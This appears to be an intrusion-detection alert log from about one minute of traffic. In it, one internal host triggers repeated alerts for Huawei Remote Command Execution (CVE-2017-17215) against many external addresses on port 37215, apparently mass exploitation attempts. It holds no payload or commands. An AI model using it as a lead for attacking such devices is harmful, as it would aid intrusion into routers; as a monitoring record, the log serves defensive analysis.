                                            06/14/24-10:44:27.000655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4393637215192.168.2.14197.121.202.144
                                            06/14/24-10:44:33.152728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6017037215192.168.2.14156.78.41.22
                                            06/14/24-10:43:52.150456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4551237215192.168.2.14197.205.252.2
                                            06/14/24-10:43:37.762911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709037215192.168.2.14156.143.248.78
                                            06/14/24-10:43:54.183199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889437215192.168.2.1441.153.90.204
                                            06/14/24-10:44:18.761078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940437215192.168.2.14156.253.253.231
                                            06/14/24-10:44:14.668565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402637215192.168.2.14156.145.191.0
                                            06/14/24-10:43:48.030179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4551437215192.168.2.14197.24.125.130
                                            06/14/24-10:43:48.032955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671237215192.168.2.14156.128.197.13
                                            06/14/24-10:43:39.789338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399637215192.168.2.14197.139.71.183
                                            06/14/24-10:44:20.805814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244637215192.168.2.14156.124.165.255
                                            06/14/24-10:43:41.897178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843437215192.168.2.14197.15.50.175
                                            06/14/24-10:44:18.762479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440037215192.168.2.1441.13.77.117
                                            06/14/24-10:44:24.917209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5325037215192.168.2.1441.198.226.91
                                            06/14/24-10:44:14.672917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202237215192.168.2.1441.31.151.169
                                            06/14/24-10:44:29.011618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408637215192.168.2.14197.101.195.37
                                            06/14/24-10:44:24.914143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193037215192.168.2.14156.22.51.22
                                            06/14/24-10:44:14.681414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274837215192.168.2.14156.30.247.88
                                            06/14/24-10:44:31.089724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698237215192.168.2.14156.216.102.66
                                            06/14/24-10:44:29.012466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3611237215192.168.2.14197.68.100.175
                                            06/14/24-10:44:22.880002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760437215192.168.2.14156.92.54.101
                                            06/14/24-10:44:20.803505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520837215192.168.2.14197.234.104.177
                                            06/14/24-10:43:36.700431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084637215192.168.2.14197.78.104.164
                                            06/14/24-10:44:08.501788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3375437215192.168.2.14197.90.40.79
                                            06/14/24-10:43:34.661972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697037215192.168.2.14156.54.177.90
                                            06/14/24-10:44:14.686836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335037215192.168.2.1441.170.90.128
                                            06/14/24-10:43:41.847506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917037215192.168.2.14197.52.236.152
                                            06/14/24-10:43:41.850403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422637215192.168.2.14156.198.9.13
                                            06/14/24-10:43:45.984650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5432037215192.168.2.1441.239.38.16
                                            06/14/24-10:43:54.186362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5610437215192.168.2.14197.177.41.44
                                            06/14/24-10:44:14.669404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933037215192.168.2.14156.62.225.88
                                            06/14/24-10:44:29.013803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785237215192.168.2.14156.30.154.72
                                            06/14/24-10:44:12.616887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587237215192.168.2.1441.19.142.53
                                            06/14/24-10:43:45.989589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5781637215192.168.2.14156.192.255.120
                                            06/14/24-10:43:36.705199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413637215192.168.2.14197.28.139.22
                                            06/14/24-10:43:36.704091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413837215192.168.2.14156.62.249.174
                                            06/14/24-10:44:06.452317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597837215192.168.2.14156.69.39.83
                                            06/14/24-10:43:50.074494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801037215192.168.2.14156.73.4.181
                                            06/14/24-10:44:12.613964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918637215192.168.2.14197.224.204.212
                                            06/14/24-10:44:24.917652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268037215192.168.2.1441.143.234.38
                                            06/14/24-10:44:00.342221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852637215192.168.2.14156.26.47.162
                                            06/14/24-10:43:34.661227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830837215192.168.2.14197.82.207.29
                                            06/14/24-10:43:50.074628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008237215192.168.2.1441.118.204.16
                                            06/14/24-10:44:00.342432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718437215192.168.2.14156.183.230.108
                                            06/14/24-10:44:06.469735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076437215192.168.2.1441.251.167.164
                                            06/14/24-10:44:08.519173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839837215192.168.2.1441.37.66.158
                                            06/14/24-10:44:08.520543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438837215192.168.2.14156.78.146.210
                                            06/14/24-10:43:48.030352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4907837215192.168.2.1441.251.72.240
                                            06/14/24-10:43:45.969397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840837215192.168.2.14197.32.60.147
                                            06/14/24-10:43:41.846513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133437215192.168.2.14156.178.97.126
                                            06/14/24-10:44:08.519042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593437215192.168.2.14197.255.150.217
                                            06/14/24-10:44:16.736440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3508837215192.168.2.14197.239.162.126
                                            06/14/24-10:44:35.181126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823037215192.168.2.1441.82.252.247
                                            06/14/24-10:44:08.502596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3357437215192.168.2.14197.144.177.226
                                            06/14/24-10:44:27.001134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852437215192.168.2.14197.41.39.177
                                            06/14/24-10:44:00.322002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631237215192.168.2.14197.59.40.154
                                            06/14/24-10:44:10.581581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4051837215192.168.2.14197.228.215.94
                                            06/14/24-10:43:58.278006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764637215192.168.2.14197.167.247.106
                                            06/14/24-10:44:12.647314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978037215192.168.2.1441.4.3.119
                                            06/14/24-10:44:18.766144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219837215192.168.2.1441.167.239.19
                                            06/14/24-10:44:33.132863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028037215192.168.2.1441.228.13.30
                                            06/14/24-10:43:36.703282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583437215192.168.2.14197.81.245.28
                                            06/14/24-10:43:36.702010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205837215192.168.2.14156.125.253.150
                                            06/14/24-10:43:58.277428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150037215192.168.2.14156.40.55.158
                                            06/14/24-10:43:58.295069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641237215192.168.2.14197.26.199.14
                                            06/14/24-10:43:56.244902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582037215192.168.2.1441.105.106.255
                                            06/14/24-10:43:50.073715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450637215192.168.2.1441.39.166.107
                                            06/14/24-10:43:56.227671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680637215192.168.2.14197.243.87.36
                                            06/14/24-10:44:20.805750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221237215192.168.2.1441.168.62.237
                                            06/14/24-10:43:36.703025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662837215192.168.2.1441.7.73.158
                                            06/14/24-10:43:52.148029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335837215192.168.2.14197.21.40.198
                                            06/14/24-10:44:14.671160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241237215192.168.2.14156.247.203.24
                                            06/14/24-10:44:08.504656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965637215192.168.2.14197.55.58.25
                                            06/14/24-10:44:24.914374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754437215192.168.2.14156.100.60.75
                                            06/14/24-10:43:48.016630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424437215192.168.2.14197.3.170.204
                                            06/14/24-10:44:18.763355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251037215192.168.2.14156.12.173.106
                                            06/14/24-10:44:04.422307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377837215192.168.2.14197.29.244.43
                                            06/14/24-10:43:34.675302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462237215192.168.2.14156.155.120.11
                                            06/14/24-10:43:39.811740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5526037215192.168.2.14156.163.12.193
                                            06/14/24-10:43:48.028320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960237215192.168.2.14197.1.129.45
                                            06/14/24-10:44:20.830071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841437215192.168.2.1441.1.171.127
                                            06/14/24-10:44:16.715432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209437215192.168.2.14197.179.88.33
                                            06/14/24-10:43:56.253610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521837215192.168.2.14197.152.72.34
                                            06/14/24-10:44:14.671484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459637215192.168.2.1441.192.236.4
                                            06/14/24-10:44:31.057594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987237215192.168.2.14197.153.69.72
                                            06/14/24-10:44:08.517537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120437215192.168.2.1441.249.178.97
                                            06/14/24-10:44:24.933581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278437215192.168.2.14156.243.64.44
                                            06/14/24-10:44:14.682982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4412037215192.168.2.1441.156.2.29
                                            06/14/24-10:43:36.724673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573437215192.168.2.1441.27.148.16
                                            06/14/24-10:44:06.472129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846237215192.168.2.1441.111.103.151
                                            06/14/24-10:44:14.686539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350637215192.168.2.14156.33.44.179
                                            06/14/24-10:43:39.792931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460437215192.168.2.14156.254.54.61
                                            06/14/24-10:44:14.689360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060037215192.168.2.14197.129.155.113
                                            06/14/24-10:44:08.520257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079037215192.168.2.1441.215.88.8
                                            06/14/24-10:44:22.878669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619837215192.168.2.1441.219.19.91
                                            06/14/24-10:44:24.917739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018037215192.168.2.14156.102.80.81
                                            06/14/24-10:44:24.913946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883637215192.168.2.14156.219.180.27
                                            06/14/24-10:43:54.198241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286437215192.168.2.1441.186.23.148
                                            06/14/24-10:43:54.203226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023437215192.168.2.14197.23.15.209
                                            06/14/24-10:43:58.275535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876437215192.168.2.14197.67.245.83
                                            06/14/24-10:44:35.182486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002037215192.168.2.1441.34.137.86
                                            06/14/24-10:44:29.024386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553037215192.168.2.1441.78.209.16
                                            06/14/24-10:44:04.409223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709037215192.168.2.14197.81.168.219
                                            06/14/24-10:44:12.645783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449037215192.168.2.14197.218.245.79
                                            06/14/24-10:44:16.718129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998437215192.168.2.14156.90.237.66
                                            06/14/24-10:44:18.777669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249037215192.168.2.14197.112.250.157
                                            06/14/24-10:43:34.663231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658637215192.168.2.1441.59.10.212
                                            06/14/24-10:43:56.229717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755837215192.168.2.14156.8.240.128
                                            06/14/24-10:44:20.805651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694437215192.168.2.1441.11.172.128
                                            06/14/24-10:44:12.625410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4014237215192.168.2.1441.198.251.184
                                            06/14/24-10:44:33.149186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960437215192.168.2.14156.156.115.237
                                            06/14/24-10:44:18.763789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635437215192.168.2.14197.7.124.250
                                            06/14/24-10:43:54.199958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668037215192.168.2.14197.146.11.25
                                            06/14/24-10:44:06.473646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321237215192.168.2.1441.50.126.212
                                            06/14/24-10:43:43.943413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949037215192.168.2.1441.203.124.184
                                            06/14/24-10:44:33.131363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089037215192.168.2.14156.39.20.215
                                            06/14/24-10:44:29.027371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890237215192.168.2.14156.16.133.25
                                            06/14/24-10:43:52.150187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584637215192.168.2.14197.91.203.241
                                            06/14/24-10:44:16.734854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636237215192.168.2.1441.167.130.183
                                            06/14/24-10:44:29.012702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687437215192.168.2.1441.26.14.95
                                            06/14/24-10:44:20.827573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5179837215192.168.2.1441.211.49.238
                                            06/14/24-10:44:12.614567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281437215192.168.2.14197.214.231.17
                                            06/14/24-10:44:16.718897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646637215192.168.2.1441.178.164.190
                                            06/14/24-10:43:52.162443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3656637215192.168.2.14197.242.10.206
                                            06/14/24-10:44:18.776016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844837215192.168.2.14197.68.26.5
                                            06/14/24-10:44:10.568223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583837215192.168.2.14197.59.23.142
                                            06/14/24-10:44:14.682833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093637215192.168.2.1441.133.232.120
                                            06/14/24-10:43:39.812067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244237215192.168.2.14156.4.192.161
                                            06/14/24-10:44:02.367083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081437215192.168.2.14197.116.166.6
                                            06/14/24-10:44:16.717920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277837215192.168.2.14156.137.105.77
                                            06/14/24-10:43:52.160255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576437215192.168.2.14156.187.140.224
                                            06/14/24-10:43:58.274724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511037215192.168.2.14156.174.46.30
                                            06/14/24-10:44:22.858603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3480837215192.168.2.14156.63.181.114
                                            06/14/24-10:44:33.135247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874437215192.168.2.14156.120.70.117
                                            06/14/24-10:43:45.988908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685837215192.168.2.1441.63.176.17
                                            06/14/24-10:44:26.979274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114437215192.168.2.1441.222.89.222
                                            06/14/24-10:43:45.968549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049837215192.168.2.1441.49.134.243
                                            06/14/24-10:44:29.012536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946237215192.168.2.14156.11.231.73
                                            06/14/24-10:44:20.828593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540237215192.168.2.14197.60.181.94
                                            06/14/24-10:43:34.678225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550637215192.168.2.14197.150.58.36
                                            06/14/24-10:43:36.702055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458837215192.168.2.14197.76.79.55
                                            06/14/24-10:43:58.273233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580037215192.168.2.14197.92.157.81
                                            06/14/24-10:43:50.115780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400437215192.168.2.14156.205.123.200
                                            06/14/24-10:43:50.074816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833437215192.168.2.1441.238.129.177
                                            06/14/24-10:44:02.387264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020637215192.168.2.14156.253.151.71
                                            06/14/24-10:44:14.687771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478037215192.168.2.1441.251.190.13
                                            06/14/24-10:43:45.967714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021637215192.168.2.14197.244.141.38
                                            06/14/24-10:43:39.808348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543237215192.168.2.1441.145.98.163
                                            06/14/24-10:44:14.687123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835437215192.168.2.14197.229.158.192
                                            06/14/24-10:44:18.762650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596837215192.168.2.14197.227.50.7
                                            06/14/24-10:44:06.453432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3588237215192.168.2.14156.117.156.189
                                            06/14/24-10:44:26.978347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133837215192.168.2.1441.44.126.87
                                            06/14/24-10:43:41.899963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434837215192.168.2.14197.239.144.132
                                            06/14/24-10:44:12.616730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5837837215192.168.2.14197.223.254.106
                                            06/14/24-10:44:00.325616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708837215192.168.2.1441.47.81.51
                                            06/14/24-10:44:14.669715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114237215192.168.2.14156.77.199.207
                                            06/14/24-10:44:35.182014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835837215192.168.2.14156.254.168.76
                                            06/14/24-10:44:16.734199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022037215192.168.2.14156.25.155.213
                                            06/14/24-10:44:24.932638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447837215192.168.2.14197.127.82.206
                                            06/14/24-10:44:33.131136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535837215192.168.2.14156.204.50.183
                                            06/14/24-10:44:24.942252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957237215192.168.2.14156.151.116.94
                                            06/14/24-10:44:12.646041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5368037215192.168.2.1441.140.119.181
                                            06/14/24-10:43:36.728696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472037215192.168.2.14156.107.131.247
                                            06/14/24-10:44:18.776806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084037215192.168.2.14197.216.203.61
                                            06/14/24-10:44:22.861229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498237215192.168.2.1441.8.124.93
                                            06/14/24-10:44:31.057191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327437215192.168.2.14156.110.35.164
                                            06/14/24-10:43:39.791628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4844037215192.168.2.14197.36.37.62
                                            06/14/24-10:43:37.760895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3832037215192.168.2.14197.247.210.248
                                            06/14/24-10:44:00.337004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554237215192.168.2.1441.172.129.201
                                            06/14/24-10:44:24.944335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176837215192.168.2.1441.179.13.38
                                            06/14/24-10:44:20.827779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009837215192.168.2.14156.181.175.241
                                            06/14/24-10:43:56.229804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315237215192.168.2.1441.92.101.122
                                            06/14/24-10:43:45.984181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932037215192.168.2.14197.134.111.118
                                            06/14/24-10:43:56.253182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529037215192.168.2.1441.53.29.66
                                            06/14/24-10:43:43.968216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4808237215192.168.2.1441.187.198.58
                                            06/14/24-10:44:29.027845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3627637215192.168.2.14197.150.163.227
                                            06/14/24-10:43:54.182648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007637215192.168.2.14156.196.38.96
                                            06/14/24-10:44:33.134413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567237215192.168.2.14156.209.216.179
                                            06/14/24-10:43:41.848630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963437215192.168.2.14156.59.32.240
                                            06/14/24-10:44:14.688795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230637215192.168.2.1441.145.255.156
                                            06/14/24-10:44:14.671920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520237215192.168.2.14156.169.142.94
                                            06/14/24-10:44:22.878831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166637215192.168.2.14197.97.124.166
                                            06/14/24-10:43:56.245292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780637215192.168.2.14156.180.113.75
                                            06/14/24-10:43:54.185691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737637215192.168.2.1441.193.214.111
                                            06/14/24-10:44:12.625094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783637215192.168.2.14197.84.4.55
                                            06/14/24-10:44:00.325089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397437215192.168.2.14156.13.75.198
                                            06/14/24-10:44:29.013667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085637215192.168.2.14156.246.216.88
                                            06/14/24-10:44:20.807305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461037215192.168.2.1441.12.205.132
                                            06/14/24-10:43:43.941790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098037215192.168.2.14197.90.112.205
